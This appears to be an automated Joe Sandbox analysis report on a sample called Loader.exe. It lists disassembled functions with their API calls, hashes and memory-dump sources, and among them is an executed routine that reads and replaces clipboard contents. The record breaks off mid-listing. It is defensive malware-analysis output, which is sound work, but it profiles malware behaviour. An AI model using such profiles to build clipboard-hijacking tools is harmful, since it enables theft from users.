Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: c2387a022d2c43acec41ec0ce6e96fcecf25427c1a0232d1e2808a70a76d5e49
Instruction ID: 16bca04db8f6054d5b170c48465bb58837e1ca0de54a303f748487b89de492b9
Opcode Fuzzy Hash: c2387a022d2c43acec41ec0ce6e96fcecf25427c1a0232d1e2808a70a76d5e49
Instruction Fuzzy Hash: 45F046762003045FCB245F79D881A7ABBD1EF80368B05446EFA064B780C7719D02D610

Function 00CD68FD Relevance: 1.5, APIs: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 00CD1D11: EnterCriticalSection.KERNEL32(?,?,00CD5DD8,?,00CEFC38,00000008,00CD5CCA,00000000,00000000,?), ref: 00CD1D20

EnumSystemLocalesW.KERNEL32(00CD68F0,00000001,00CEFCB8,0000000C,00CD62F1,-00000050), ref: 00CD6935

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 3a87c1a2bcf279c095bc947c00fc6540ec240aa6b8e8e85e677bd54b2d6251bf
Instruction ID: 14b7bb9ecc3c744297d85138a871eb708befc8cf2ab40ab49df02fc02893bba0
Opcode Fuzzy Hash: 3a87c1a2bcf279c095bc947c00fc6540ec240aa6b8e8e85e677bd54b2d6251bf
Instruction Fuzzy Hash: 90F03776A00204EFD710EFA8E842BAC77F0EB08721F10802AF9119B2E1CB755905DF41

Function 00CDB0C5 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

EnumSystemLocalesW.KERNEL32(00CDB110,00000001,?,?,?,00CDAB35,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 00CDB0FC

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ab8e99663ab60602f4ab6573ba142bbea3e130834a6c6fc625282b5bbe1ba0ad
Instruction ID: d9ff94fa078ce99b31acb1021d7a8699b140a079fec903d11507c3b1b3604c4d
Opcode Fuzzy Hash: ab8e99663ab60602f4ab6573ba142bbea3e130834a6c6fc625282b5bbe1ba0ad
Instruction Fuzzy Hash: CAF0203630020997CB049B39C86566A7B94EBC1760B0B405EEB098B280C6319D42C790

Function 00CD63F5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00CD0A63,?,20001004,00000000,00000002,?,?,00CCF971), ref: 00CD6429

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 243629c0de76b2539fa798d0a2d6332bc616cc87fce0fa9fa6931ad27a0fb18c
Instruction ID: a609435f530a2f4285313b4b4293f3d3b29251105debaca985087fed0c95dd62
Opcode Fuzzy Hash: 243629c0de76b2539fa798d0a2d6332bc616cc87fce0fa9fa6931ad27a0fb18c
Instruction Fuzzy Hash: 95E04F3550026CBBCF126F61DC05FAE7F5AEF48790F048022FE0566361CB318D20EA91

Function 00CC9A67 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009B90), ref: 00CC9A6C

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 513ed9a4f91d6243c1700b77a984f1dc1bc9fc99a79f0b0fe9437e0681077aa5
Instruction ID: 912a1fc000e371ecdd7c6c990689a00d141b4320fa905564c9c6952963b7b17f
Opcode Fuzzy Hash: 513ed9a4f91d6243c1700b77a984f1dc1bc9fc99a79f0b0fe9437e0681077aa5
Instruction Fuzzy Hash:

Function 00CD7020 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00CD7020

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 080f85c1611164c5ae251785a78c2dc4e2e08ef6bd52ef63ca87e65166dd7a52
Instruction ID: 90025941bedcb1e6800a2dc4df6294398295f57a9c8c524bf2fc379393342888
Opcode Fuzzy Hash: 080f85c1611164c5ae251785a78c2dc4e2e08ef6bd52ef63ca87e65166dd7a52
Instruction Fuzzy Hash: 15A02230200202CFE3008F3ABE88F0C3BE8EA022C030E80A8E800C80B0EB308080EF03

Function 00CD3440 Relevance: .5, Instructions: 455COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction ID: f09b3633338d12160ccde477e2175bcc3e9de1d04db047e184a1069ed48ca42b
Opcode Fuzzy Hash: 5bda445c65ae4a74fe40377494680e1620293ac17931db5f8abb93f471be9a26
Instruction Fuzzy Hash: 03025FB1E002599BDF14CFA9D9806AEF7F1FF48314F15826AE615E7380D731AA41CB91

Function 00CC1BA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4fcb3c54eb2a5a6d7730287255226edb0e05290f15c0267366bbb4e5d3e68af
Instruction ID: 79e62d1b0d2bf014e915cccdff4962edf50acd283e96628c3de7a9ba53efb8bb
Opcode Fuzzy Hash: f4fcb3c54eb2a5a6d7730287255226edb0e05290f15c0267366bbb4e5d3e68af
Instruction Fuzzy Hash: 0DD06C3A641A58AFC210CF49E440E41F7A8FB8A670B154166EA4893B20C331F811CAE0

Function 00CCF1F8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F876D5F9,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF22D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00CCF23F
FreeLibrary.KERNEL32(00000000,?,?,00000000,00CE5684,000000FF,?,00CCF2B9,00CCF1A0,?,00CCF355,00000000), ref: 00CCF261

Strings

mscoree.dll, xrefs: 00CCF226
CorExitProcess, xrefs: 00CCF237

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
Instruction ID: 51fe5f837b2f135867c6f83b3ae652e277899cee35f8cb93577663868d64b91e
Opcode Fuzzy Hash: a2d9dcd19b2448c5b8402dc9d7dd3bcc9ca4d6784d8f3e26b924ce624c12927d
Instruction Fuzzy Hash: CE01A235940699AFDB119B54DC49FAEBBB9FB04B55F040639F821A62D0DB749900CA80

Function 00CE2E9C Relevance: 7.8, APIs: 5, Instructions: 292COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d5dd931abb98a2af702599b9199d7d693cf5ed82371373e01fe11bfd67f5bc5
Instruction ID: 0c42690a5293a3ac0271bf4a51ba46008a5e67c5c317d6596c9e33a8351006d6
Opcode Fuzzy Hash: 8d5dd931abb98a2af702599b9199d7d693cf5ed82371373e01fe11bfd67f5bc5
Instruction Fuzzy Hash: 78B11371A042C9AFDB11DFAAC885BBEBBB1BF45310F144159E9259B392C770AF41CB60

Function 00CDF6B0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC), ref: 00CDF6BD
GetLastError.KERNEL32(?,00CDF74C,00000000,?,00CF1E20,?,?,?,00CDF683,00000004,InitializeCriticalSectionEx,00CE90D4,00CE90DC,00000000,?,00CD539C), ref: 00CDF6C7
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00CDF6EF

Strings

api-ms-, xrefs: 00CDF6D4

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
Instruction ID: a6e6a6bdbff0a587afffd36758e777df52815c18fd78f530e4cd1be447f1fecf
Opcode Fuzzy Hash: 75209266c5bbba266a79f34a1350649c008b64fa3943a6752b0e0c5d1370b9a9
Instruction Fuzzy Hash: 4FE04831250245B7FB201B61EC4AF5C3BD5EF00B94F240031FB0DA85F1DBA2DA52A584

Function 00CDD74E Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(F876D5F9,00000000,00000000,?), ref: 00CDD7B1

Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00CDDA03
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00CDDA49
GetLastError.KERNEL32 ref: 00CDDAEC

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
Instruction ID: 3f1b8f3fc431f1d241885f0922b159d14a88d26990f25db49c429096bb3fda57
Opcode Fuzzy Hash: 53e6cbe35fda440bb33c8cf1bc6743ee7a952cb53d3a88454833468799c35e42
Instruction Fuzzy Hash: 0BD16B75D042499FCF15CFA8D880AEDBBB9FF08314F28816AE56AEB351D730A941DB50

Function 00CDC96E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00CDC976

Part of subcall function 00CD5801: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00CD6FD5,?,00000000,-00000008), ref: 00CD5862

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9AE
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00CDC9CE

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 9dc3e59d2104e46a51e5bd0032cd2ac7e8b0a971e58c9d227a5a5cb9b5f3a527
Instruction ID: 44a74750a3d50ddadf136801311ad7195afc80b53598e95685e62a35dbe60c8e
Opcode Fuzzy Hash: 9dc3e59d2104e46a51e5bd0032cd2ac7e8b0a971e58c9d227a5a5cb9b5f3a527
Instruction Fuzzy Hash: 0911EDF2901A4B7FA72167BA5CC9D7F69ACDE843E43100027FA09A1344EE21CE01B5B0

Function 00CDA126 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

Part of subcall function 00CD594A: GetLastError.KERNEL32(00000000,?,00CD7CCD), ref: 00CD594E
Part of subcall function 00CD594A: SetLastError.KERNEL32(00000000,?,?,00000028,00CD1F93), ref: 00CD59F0

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?,?), ref: 00CDA1E5
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00CCF809,?,?,?,00000055,?,-00000050,?,?), ref: 00CDA21C

Strings

utf8, xrefs: 00CDA2EE

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: utf8
API String ID: 943130320-905460609
Opcode ID: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
Instruction ID: 69bcb6ecc8bc961f5dda2b8cd72b25758425dedc841c6775f251907defd2903f
Opcode Fuzzy Hash: 6519d8649561bd0ddf2f43812fc5e2234c0bbc46080a7a6d51bbb08e8e3c1c37
Instruction Fuzzy Hash: 5E51D471600705BADB25AB71CC42BBA73A9EF44700F14042BFB599B391EB70EE4096A7

Function 00CD5170 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00CD5071,?,?,00000000,00000000,00000000,?), ref: 00CD5195

Strings

MOC, xrefs: 00CD51A7
RCC, xrefs: 00CD51AF

Memory Dump Source

Source File: 00000000.00000002.91037836223.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true

Associated: 00000000.00000002.91037813164.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037884980.0000000000CE6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037915338.0000000000CF0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037941300.0000000000CF1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037967705.0000000000CF4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.91037996821.0000000000CF7000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cc0000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
Instruction ID: d3be2a93a58237ddd89be69764adb2e7e60903885c7640748034030d17a2f5af
Opcode Fuzzy Hash: 9884ccd223d69b7c91230ef554538abd5491e0108e74ea868c8098adfb0b72f8
Instruction Fuzzy Hash: 06418972900609AFCF15CF98CD81AEEBBB5FF08304F18805AFA24A7311D335AA50DB51

Analysis Process: Loader.exePID: 1980, Parent PID: 6576COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	4.9%
Signature Coverage:	48.9%
Total number of Nodes:	329
Total number of Limit Nodes:	32

Executed Functions

Function 004375F0 Relevance: 34.0, APIs: 12, Strings: 7, Instructions: 766
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,47F545A1,8D8C93A7,?,^WPQ,?), ref: 004376FB
CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437814
SysAllocString.OLEAUT32(47F545A1), ref: 00437877
CoSetProxyBlanket.COMBASE(234EB62B,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004378C0
SysAllocString.OLEAUT32(47F545A1), ref: 00437900
SysAllocString.OLEAUT32(47F545A1), ref: 004379AF
VariantInit.OLEAUT32(^WPQ), ref: 00437A20

Strings

^WPQ, xrefs: 00437648, 004376F5
,-, xrefs: 0043796A
u@P, xrefs: 00437DE0
:, xrefs: 004377B9
\, xrefs: 004377CE
y@P, xrefs: 00437E25
w)y+, xrefs: 00437962

Memory Dump Source

Source File: 00000003.00000002.96102182932.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.96102182932.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString$BlanketCreateEnvironmentExpandInitInstanceProxyStringsVariant
String ID: ,-$:$\$^WPQ$u@P$w)y+$y@P
API String ID: 1094070830-2312098703
Opcode ID: c8f4d1e411c4d3d4e77a0d712e2afde03ca7b99385f9f459733e735439b93fc8
Instruction ID: 1391369bab9cb79c0d95e69b9b664ab1f6950a92ea3c911c3add56bdd0495d94
Opcode Fuzzy Hash: c8f4d1e411c4d3d4e77a0d712e2afde03ca7b99385f9f459733e735439b93fc8
Instruction Fuzzy Hash: D432DEB26483408BD724CF24C8807ABBBE1EFC9314F149A2EE9D59B391D778D805CB56

Function 05C91000 Relevance: 19.6, APIs: 13, Instructions: 81
clipboardsleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000001), ref: 05C91032
OpenClipboard.USER32(00000000), ref: 05C9103C
GetClipboardData.USER32(0000000D), ref: 05C9104C
GlobalLock.KERNEL32(00000000), ref: 05C9105D
GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05C91090
GlobalLock.KERNEL32 ref: 05C910A0
GlobalUnlock.KERNEL32 ref: 05C910C1
EmptyClipboard.USER32 ref: 05C910CB
SetClipboardData.USER32(0000000D), ref: 05C910D6
GlobalFree.KERNEL32 ref: 05C910E3
GlobalUnlock.KERNEL32(?), ref: 05C910ED
CloseClipboard.USER32 ref: 05C910F3
GetClipboardSequenceNumber.USER32 ref: 05C910F9

Memory Dump Source

Source File: 00000003.00000002.96103587935.0000000005C91000.00000020.00000800.00020000.00000000.sdmp, Offset: 05C90000, based on PE: true

Associated: 00000003.00000002.96103561963.0000000005C90000.00000002.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.96103612711.0000000005C92000.00000002.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5c90000_Loader.jbxd

Similarity

API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
String ID:
API String ID: 1416286485-0
Opcode ID: e76120c367faa645ef63b52673968efe410d161f98144d1048281022e15b1bf3
Instruction ID: 789751b3adc66fa3c12f09cdb825095818404ef9c5adc15fb0a53af1ec69a962
Opcode Fuzzy Hash: e76120c367faa645ef63b52673968efe410d161f98144d1048281022e15b1bf3
Instruction Fuzzy Hash: 2C218335614251BBDF252BF1AC0FB6A7BACFF04781F081968F986D6150EF228910C7E1

Function 0040E460 Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 347
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E46C

Strings

